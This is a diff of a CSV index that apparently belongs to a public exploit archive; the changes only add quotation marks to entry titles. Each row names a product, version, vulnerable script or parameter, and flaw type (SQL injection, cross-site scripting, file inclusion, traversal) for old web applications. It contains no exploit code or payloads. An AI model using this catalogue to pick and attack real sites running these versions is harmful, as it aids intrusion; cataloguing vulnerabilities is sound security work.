26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-20,bl2k,php,webapps,0 -26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 +26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - 'browse.php' Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0 26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",php,webapps,0 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - 'user.php?htmltext' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 -26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 +26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - 'viewdownload.php' SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26190,platforms/php/webapps/26190.txt,"SaveWebPortal 3.4 - Unauthorized Access",2005-08-23,rgod,php,webapps,0 26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusions",2005-08-23,rgod,php,webapps,0 26192,platforms/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,php,webapps,0 26193,platforms/php/webapps/26193.txt,"SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities",2005-08-23,rgod,php,webapps,0 26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog - Html Injection",2005-08-24,ali202,php,webapps,0 -26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - error.php Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0 +26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - 'error.php' Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0 26200,platforms/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",php,webapps,0 26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps,0 26202,platforms/php/webapps/26202.txt,"Looking Glass - Cross-Site Scripting",2005-08-27,rgod,php,webapps,0 26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,php,webapps,0 -26204,platforms/php/webapps/26204.pl,"MyBB - member.php SQL Injection",2005-08-29,W7ED,php,webapps,0 +26204,platforms/php/webapps/26204.pl,"MyBB - 'member.php' SQL Injection",2005-08-29,W7ED,php,webapps,0 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php' c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 - 'events.php?c' SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - 'list.php' Multiple SQL Injections",2005-08-29,matrix_killer,php,webapps,0 @@ -28874,7 +28875,7 @@ id,file,description,date,author,platform,type,port 26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 26228,platforms/php/webapps/26228.txt,"MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections",2005-09-06,stranger-killer,php,webapps,0 26229,platforms/php/webapps/26229.txt,"phpCommunityCalendar 4.0 - Multiple SQL Injections",2005-09-07,rgod,php,webapps,0 -26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System - SetCookie.php Directory Traversal",2005-09-07,rgod,php,webapps,0 +26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System - 'SetCookie.php' Directory Traversal",2005-09-07,rgod,php,webapps,0 26232,platforms/php/webapps/26232.txt,"phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps,0 26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - startup.php Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - 'news.php' Multiple SQL Injections",2005-09-08,onkel_fisch,php,webapps,0 @@ -28898,7 +28899,7 @@ id,file,description,date,author,platform,type,port 26260,platforms/php/webapps/26260.txt,"TWiki TWikiUsers - Arbitrary Command Execution",2005-09-14,B4dP4nd4,php,webapps,0 26261,platforms/php/webapps/26261.txt,"Noah's Classifieds 1.3 - 'index.php' Cross-Site Scripting",2005-09-14,trueend5,php,webapps,0 26262,platforms/php/webapps/26262.txt,"Digital Scribe 1.4 - Login SQL Injection",2005-09-15,rgod,php,webapps,0 -26263,platforms/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - search_result.php SQL Injection",2005-09-15,alexsrb,php,webapps,0 +26263,platforms/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injection",2005-09-15,alexsrb,php,webapps,0 26264,platforms/php/webapps/26264.txt,"DeluxeBB 1.0 - 'topic.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26265,platforms/php/webapps/26265.txt,"DeluxeBB 1.0 - 'misc.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 - 'forums.php' SQL Injection",2005-09-15,abducter,php,webapps,0 @@ -28927,13 +28928,13 @@ id,file,description,date,author,platform,type,port 26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers - INCLUDE Function Arbitrary Command Execution",2005-09-28,JChristophFuchs,php,webapps,0 26303,platforms/php/webapps/26303.txt,"CubeCart 3.0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-28,Lostmon,php,webapps,0 26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 - 'cart.php?redir' Cross-Site Scripting",2005-09-28,Lostmon,php,webapps,0 -26305,platforms/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin - add.php Cross-Site Scripting",2005-09-29,anonymous,php,webapps,0 +26305,platforms/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting",2005-09-29,anonymous,php,webapps,0 26307,platforms/php/webapps/26307.txt,"LucidCMS 2.0 - Login SQL Injection",2005-09-29,rgod,php,webapps,0 26308,platforms/php/webapps/26308.txt,"IceWarp Web Mail 5.5.1 - blank.html id Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 26309,platforms/php/webapps/26309.txt,"IceWarp Web Mail 5.5.1 - calendar_d.html createdataCX Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 26310,platforms/php/webapps/26310.txt,"IceWarp Web Mail 5.5.1 - calendar_m.html createdataCX Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 26311,platforms/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 - calendar_w.html createdataCX Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 -26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 - Printfaq.php Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 +26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 - 'Printfaq.php' Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps,0 26386,platforms/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple SQL Injections",2005-10-24,papipsycho,php,webapps,0 26387,platforms/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - 'artid' SQL Injection",2005-10-24,papipsycho,php,webapps,0 @@ -28949,7 +28950,7 @@ id,file,description,date,author,platform,type,port 26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",cgi,webapps,0 26345,platforms/php/webapps/26345.txt,"YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0 26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager - 'Password' SQL Injection",2005-10-13,imready4chillin,php,webapps,0 -26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0 +26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - 'main.php' Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0 26349,platforms/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0 26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - 'search.php' SQL Injection",2005-10-15,Devil_box,php,webapps,0 @@ -28972,7 +28973,7 @@ id,file,description,date,author,platform,type,port 26371,platforms/php/webapps/26371.txt,"MySource 2.14 - 'Span.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26372,platforms/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26373,platforms/php/webapps/26373.txt,"MySource 2.14 - 'mime.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - modules.php Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 +26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - 'modules.php' Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php' forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - 'quote.php?forumID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum - 'recommend.php?ID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 @@ -28984,10 +28985,10 @@ id,file,description,date,author,platform,type,port 26389,platforms/php/webapps/26389.pl,"Nuked-klaN 1.7 Links Module - 'link_id' SQL Injection",2005-10-24,papipsycho,php,webapps,0 26390,platforms/php/webapps/26390.txt,"saPHP Lesson - 'add.php?forumid' SQL Injection",2005-10-26,almaster,php,webapps,0 26391,platforms/php/webapps/26391.html,"SiteTurn Domain Manager Pro - Admin Panel Cross-Site Scripting",2005-10-24,"farhad koosha",php,webapps,0 -26392,platforms/php/webapps/26392.txt,"phpMyAdmin 2.x - queryframe.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 -26393,platforms/php/webapps/26393.txt,"phpMyAdmin 2.x - server_databases.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 -26394,platforms/php/webapps/26394.txt,"MWChat 6.8 - chat.php SQL Injection",2005-05-21,rgod,php,webapps,0 -26395,platforms/php/webapps/26395.txt,"Basic Analysis and Security Engine (BASE) 1.2 - Base_qry_main.php SQL Injection",2005-10-25,"Remco Verhoef",php,webapps,0 +26392,platforms/php/webapps/26392.txt,"phpMyAdmin 2.x - 'queryframe.php' Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 +26393,platforms/php/webapps/26393.txt,"phpMyAdmin 2.x - 'server_databases.php' Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 +26394,platforms/php/webapps/26394.txt,"MWChat 6.8 - 'chat.php' SQL Injection",2005-05-21,rgod,php,webapps,0 +26395,platforms/php/webapps/26395.txt,"Basic Analysis and Security Engine (BASE) 1.2 - 'Base_qry_main.php' SQL Injection",2005-10-25,"Remco Verhoef",php,webapps,0 26396,platforms/php/webapps/26396.pl,"MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection",2005-10-26,Animal,php,webapps,0 26397,platforms/php/webapps/26397.txt,"IPBProArcade 2.5.2 - GameID Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 26398,platforms/cgi/webapps/26398.txt,"RSA ACE Agent 5.x - Image Cross-Site Scripting",2005-10-26,"Bernhard Mueller",cgi,webapps,0 @@ -28996,7 +28997,7 @@ id,file,description,date,author,platform,type,port 26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps,0 26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php?gid' SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities",2013-06-24,"Glafkos Charalambous",php,webapps,0 -27541,platforms/php/webapps/27541.txt,"DbbS 2.0 - Topics.php SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 +27541,platforms/php/webapps/27541.txt,"DbbS 2.0 - 'Topics.php' SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - 'mage_desc.php' Multiple SQL Injections",2006-03-31,Linux_Drox,php,webapps,0 27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - 'template.php?provided' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 26408,platforms/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -29010,8 +29011,8 @@ id,file,description,date,author,platform,type,port 26426,platforms/asp/webapps/26426.html,"Techno Dreams (Multiple Scripts) - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps,0 26427,platforms/php/webapps/26427.txt,"GCards 1.43 - 'news.php' SQL Injection",2005-10-26,svsecurity,php,webapps,0 26428,platforms/php/webapps/26428.html,"PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection",2005-10-26,bhfh01,php,webapps,0 -26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - 'computers/default.asp?Direction' SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 -26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - 'reports/default.asp' Multiple SQL Injections",2005-10-27,"Dennis Rand",asp,webapps,0 +26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - '/computers/default.asp?Direction' SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 +26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - '/reports/default.asp' Multiple SQL Injections",2005-10-27,"Dennis Rand",asp,webapps,0 26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0 26432,platforms/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 26433,platforms/php/webapps/26433.txt,"ATutor 1.x - 'print.php' section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 @@ -29026,30 +29027,30 @@ id,file,description,date,author,platform,type,port 26442,platforms/php/webapps/26442.txt,"PHP 4.x - PHPInfo Cross-Site Scripting",2005-10-31,"Stefan Esser",php,webapps,0 26444,platforms/asp/webapps/26444.txt,"Comersus Backoffice 4.x/5.0/6.0 - 'comersus_Backoffice_supportError.asp?error' Cross-Site Scripting",2005-10-31,_6mO_HaCk,asp,webapps,0 26445,platforms/asp/webapps/26445.pl,"Comersus Backoffice 4.x/5.0/6.0 - '/comersus/database/comersus.mdb' Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 -26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - Addrbook.php SQL Injection",2005-11-01,almaster,php,webapps,0 +26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - 'Addrbook.php' SQL Injection",2005-11-01,almaster,php,webapps,0 26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,php,webapps,0 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps,0 26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php?type' Remote Code Execution",2013-06-26,infodox,php,webapps,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 -26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0 +26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - 'post.php' SQL Injection",2005-11-01,almaster,php,webapps,0 26458,platforms/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,php,webapps,0 -26459,platforms/php/webapps/26459.txt,"PHPWebThings 0.4.4 - forum.php Cross-Site Scripting",2005-11-02,Linux_Drox,php,webapps,0 +26459,platforms/php/webapps/26459.txt,"PHPWebThings 0.4.4 - 'forum.php' Cross-Site Scripting",2005-11-02,Linux_Drox,php,webapps,0 26461,platforms/cgi/webapps/26461.txt,"Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26462,platforms/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26463,platforms/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26467,platforms/php/webapps/26467.txt,"PHP Handicapper - Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0 -26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - showgallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 +26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - 'showgallery.php' SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0 26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0 26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps,0 26474,platforms/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0 26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Inclusion",2005-11-07,khc@bsdmail.org,php,webapps,0 -26477,platforms/php/webapps/26477.txt,"XMB Forum 1.9.3 - u2u.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 +26477,platforms/php/webapps/26477.txt,"XMB Forum 1.9.3 - 'u2u.php' Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-07,benjilenoob,php,webapps,0 -26480,platforms/php/webapps/26480.txt,"ToendaCMS 0.6.1 - admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 +26480,platforms/php/webapps/26480.txt,"ToendaCMS 0.6.1 - 'admin.php' Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - '/admin/admin.php?id' SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - '/admin/editattributes.php?id' SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-07,"Tobias Klein",php,webapps,0 @@ -29058,7 +29059,7 @@ id,file,description,date,author,platform,type,port 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - frameset.htm sap-syscmd Parameter Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI redirection",2005-11-09,"Leandro Meiners",php,webapps,0 -26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 - Tiki-view_forum_thread.php Cross-Site Scripting",2005-11-09,"Moritz Naumann",php,webapps,0 +26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 - 'Tiki-view_forum_thread.php' Cross-Site Scripting",2005-11-09,"Moritz Naumann",php,webapps,0 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 - 'download.php' File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0 @@ -29077,7 +29078,7 @@ id,file,description,date,author,platform,type,port 26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 26515,platforms/php/webapps/26515.txt,"Alstrasoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0 -26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 - profile.php Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0 +26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 - 'profile.php' Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0 26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - 'subscribers.tracking.edit.php?subtrackingid' SQL Injection",2005-12-14,r0t,php,webapps,0 26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,php,webapps,0 26521,platforms/php/webapps/26521.txt,"C.P.Sub 4.5 - Authentication Bypass",2013-07-01,Chako,php,webapps,0 @@ -29088,17 +29089,17 @@ id,file,description,date,author,platform,type,port 26532,platforms/jsp/webapps/26532.txt,"Revize CMS - Query_results.jsp SQL Injection",2005-11-17,Lostmon,jsp,webapps,0 26533,platforms/jsp/webapps/26533.txt,"Revize CMS - Revize.XML Information Disclosure",2005-11-17,Lostmon,jsp,webapps,0 26534,platforms/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet - Cross-Site Scripting",2005-11-17,Lostmon,jsp,webapps,0 -26535,platforms/php/webapps/26535.txt,"Litespeed 2.1.5 - ConfMgr.php Cross-Site Scripting",2005-11-17,"Gama Sec",php,webapps,0 +26535,platforms/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",php,webapps,0 26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart - Shopadmin.asp HTML Injection",2005-11-17,ConcorDHacK,asp,webapps,0 -26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 - options.php / viewforum.php SQL Injection",2005-11-19,"Robin Verton",php,webapps,0 -26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - popup.php Cross-Site Scripting",2005-11-21,[GB],php,webapps,0 -26541,platforms/php/webapps/26541.txt,"SimplePoll - results.php SQL Injection",2005-11-21,stranger-killer,php,webapps,0 -26543,platforms/php/webapps/26543.txt,"APBoard - thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 +26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 - 'options.php / viewforum.php' SQL Injection",2005-11-19,"Robin Verton",php,webapps,0 +26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - 'popup.php' Cross-Site Scripting",2005-11-21,[GB],php,webapps,0 +26541,platforms/php/webapps/26541.txt,"SimplePoll - 'results.php' SQL Injection",2005-11-21,stranger-killer,php,webapps,0 +26543,platforms/php/webapps/26543.txt,"APBoard - 'thread.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - 'files.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection",2005-11-21,Lostmon,php,webapps,0 26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 - 'profile.php?user' Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 - 'mail.php?user' Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 -26549,platforms/php/webapps/26549.txt,"Torrential 1.2 - Getdox.php Directory Traversal",2005-11-22,Shell,php,webapps,0 +26549,platforms/php/webapps/26549.txt,"Torrential 1.2 - 'Getdox.php' Directory Traversal",2005-11-22,Shell,php,webapps,0 26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple SQL Injections",2005-11-22,"Moritz Naumann",cgi,webapps,0 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-11-22,"Moritz Naumann",cgi,webapps,0 @@ -29112,7 +29113,7 @@ id,file,description,date,author,platform,type,port 26564,platforms/php/webapps/26564.txt,"AFFCommerce Shopping Cart 1.1.4 - 'ItemReview.php?item_id' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26565,platforms/php/webapps/26565.txt,"Tunez 1.21 - 'songinfo.php?song_id' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26566,platforms/php/webapps/26566.txt,"Tunez 1.21 - 'search.php?searchFor' Cross-Site Scripting",2005-11-23,r0t3d3Vil,php,webapps,0 -26567,platforms/php/webapps/26567.txt,"WSN Forum 1.21 - memberlist.php SQL Injection",2005-11-23,r0t,php,webapps,0 +26567,platforms/php/webapps/26567.txt,"WSN Forum 1.21 - 'memberlist.php' SQL Injection",2005-11-23,r0t,php,webapps,0 26568,platforms/php/webapps/26568.txt,"OmnistarLive 5.2 - Multiple SQL Injections",2005-11-23,r0t,php,webapps,0 26569,platforms/php/webapps/26569.txt,"PHP Labs Survey Wizard - SQL Injection",2005-11-23,r0t,php,webapps,0 26570,platforms/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 @@ -29129,7 +29130,7 @@ id,file,description,date,author,platform,type,port 26585,platforms/php/webapps/26585.txt,"vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 26586,platforms/php/webapps/26586.txt,"vTiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0 26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - 'index.php' SQL Injection",2005-11-24,r0t,php,webapps,0 -26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 +26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - 'forum.php' SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 26589,platforms/php/webapps/26589.txt,"OvBB 0.x - 'thread.php?threadid' SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 